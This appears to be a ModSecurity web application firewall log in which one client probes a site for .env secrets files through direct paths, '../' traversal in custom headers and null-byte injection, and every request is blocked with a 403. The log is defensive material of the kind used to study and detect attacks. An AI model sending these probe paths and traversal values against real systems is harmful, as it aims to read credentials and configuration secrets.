[Tue May 12 06:16:27.419664 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.420001 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:27.522607 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmtr1yOh9TvizezitowAAAFE"]
[Tue May 12 06:16:27.547205 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKpm9r1yOh9TvizezitpAAAAFE"]
[Tue May 12 06:16:27.547398 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKpm9r1yOh9TvizezitpAAAAFE"]
[Tue May 12 06:16:27.638664 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpmxfeipD4uoG21Fo_0QAAAAU"]
[Tue May 12 06:16:27.638752 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpmxfeipD4uoG21Fo_0QAAAAU"]
[Tue May 12 06:16:27.638931 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpmxfeipD4uoG21Fo_0QAAAAU"]
[Tue May 12 06:16:28.523496 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmxs7kySIUZ3ORnI1RAAAARE"]
[Tue May 12 06:16:28.524025 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmxfeipD4uoG21Fo_0AAAAAI"]
[Tue May 12 06:16:28.548908 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKpnBfeipD4uoG21Fo_0wAAAAI"]
[Tue May 12 06:16:28.549099 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKpnBfeipD4uoG21Fo_0wAAAAI"]
[Tue May 12 06:16:28.550618 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.550658 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.550684 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.550900 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.550954 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.550985 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.551374 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:28.618774 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpm9r1yOh9TvizezitpAAAAFE"]
[Tue May 12 06:16:28.643859 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKpnNr1yOh9TvizezitpgAAAFE"]
[Tue May 12 06:16:28.644064 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKpnNr1yOh9TvizezitpgAAAFE"]
[Tue May 12 06:16:28.712927 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpmxfeipD4uoG21Fo_0QAAAAU"]
[Tue May 12 06:16:28.738835 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpnBfeipD4uoG21Fo_1QAAAAU"]
[Tue May 12 06:16:28.738934 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpnBfeipD4uoG21Fo_1QAAAAU"]
[Tue May 12 06:16:28.739100 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.166:7130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpnBfeipD4uoG21Fo_1QAAAAU"]
[Tue May 12 06:16:29.447899 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnBs7kySIUZ3ORnI1RQAAARE"]
[Tue May 12 06:16:29.460109 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnBfeipD4uoG21Fo_0wAAAAI"]
[Tue May 12 06:16:29.478639 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.478694 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.478722 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.478919 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.478959 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.479280 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKpnRs7kySIUZ3ORnI1SAAAARE"]
[Tue May 12 06:16:29.493997 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpnRfeipD4uoG21Fo_1wAAAAI"]
[Tue May 12 06:16:29.494191 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpnRfeipD4uoG21Fo_1wAAAAI"]
[Tue May 12 06:16:29.555168 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:33262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpnNr1yOh9TvizezitpgAAAFE"]
